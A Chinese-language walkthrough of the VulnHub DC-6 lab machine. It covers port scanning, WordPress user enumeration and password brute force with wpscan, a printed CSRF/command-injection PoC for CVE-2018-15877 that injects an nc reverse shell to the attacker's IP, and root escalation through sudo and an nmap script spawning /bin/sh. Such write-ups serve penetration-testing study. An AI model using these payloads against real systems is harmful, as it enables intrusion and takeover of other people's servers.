VulnHub通关日记-DC_6-Walkthrough

2023-05-25 80

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 好的，这并不是一个真正的线索，但是对于那些只是想继续工作的人，更多的是“我们不想花五年时间等待某个过程完成”的建议。

VulnHub通关日记-DC_6-Walkthrough

靶机介绍

好的，这并不是一个真正的线索，但是对于那些只是想继续工作的人，更多的是“我们不想花五年时间等待某个过程完成”的建议。

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

那应该节省您几年。;-)

运用的知识

wpsacn爆破网站用户密码 wordpress后台Activity monitor插件命令注入获取shellnmap提权获取root

信息搜集

拿到IP后对它进行扫描端口开放服务：

nmap -A -T4 192.168.1.145

nmap扫描

扫描出来后发现它开放了80（http），22（ssh），紧接着访问http://192.168.1.145 发现它重定向到了这个URL：wordy

扫描结果

然后我设置了一下hosts文件：

设置主机文件

设置好之后打开http://wordy 发现它的CMS是Wordpress：

判断cms

wpscan爆破网站用户密码

的英文既然wordpress那么我就先用wpscan来对它进行扫描把：

wpscan --url http://wordy/ -e u

wpscan爆破

扫描出来后发现它有这些用户：

adminjensgrahammarksarah

紧接着我又生成了一些字典文件来对它网站进行爆破：

cat /usr/share/wordlists/rockyou.txt | grep k01# 这是作者给我们的提示！

生成完字典后对它的网站用户名挨个爆破枚举，看看能不能捡漏：

wpscan --url http://wordy/ -U user -P passwords.txt

用户名枚举

爆破成功后得到mark的密码：

Username: mark, Password: helpdesk01

随后我用得到的账号和密码登陆到了网站的后台发现了一个插件：Activity monitor

发现插件活动监视器

活动监视器插件命令注入获取shell

看到这个插件我去搜索了一下发现有一个命令注入：

命令注入

PoC:
-->
<html>
  <!--  Wordpress Plainview Activity Monitor RCE
        [+] Version: 20161228 and possibly prior
        [+] Description: Combine OS Commanding and CSRF to get reverse shell
        [+] Author: LydA(c)ric LEFEBVRE
        [+] CVE-ID: CVE-2018-15877
        [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
        [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="ip" value="google.fr| nc 192.168.1.128 9999 -e /bin/bash" />
      <input type="hidden" name="lookup" value="Lookup" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

插入有效载荷

设置好之后KALI用nc监听6666端口，访问得到poc.html一枚shell：

访问

GetShell

先让他得到一个bash外壳把：

python -c 'import pty;pty.spawn("/bin/bash")'

python的bash外壳

通过信息搜集我发现mark目录下有一个文件，里面预定了graham的密码：

Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)- Buy present for Sarah's farewell party- Add new user: graham - GSo7isUM1D4 - done- Apply for the OSCP course- Buy new laptop for Sarah's replacement

graham密码

拿到密码后我ssh登陆到了graham：

登录graham

sudo切换到jens用户

登陆成功后我习惯性的sudo -l发现graham用户可以以jens的身份去运行/home/jens/backups.sh文件：

查看backups.sh文件后发现它是一个解压的命令，然后我以jens身份去运行这个文件成功切换到了jens：

sudo -u jens /home/jens/backups.sh

切换到jens用户

nmap提权

成功来到jens用户后我又是习惯性的sudo -l发现它可以以root身份去运行/usr/bin/nmap：

nmap提权1

最后也是用nmap提权为root用户：

TF=$(mktemp)echo 'os.execute("/bin/sh")' > $TFsudo nmap --script=$TF

nmap提权2

最终也是在/root目录下拿到了Flag〜

VulnHub通关日记-DC_6-Walkthrough

VulnHub通关日记-DC_6-Walkthrough

靶机介绍

运用的知识

信息搜集

wpscan爆破网站用户密码

活动监视器插件命令注入获取shell

sudo切换到jens用户

nmap提权

热门文章

最新文章

相关电子书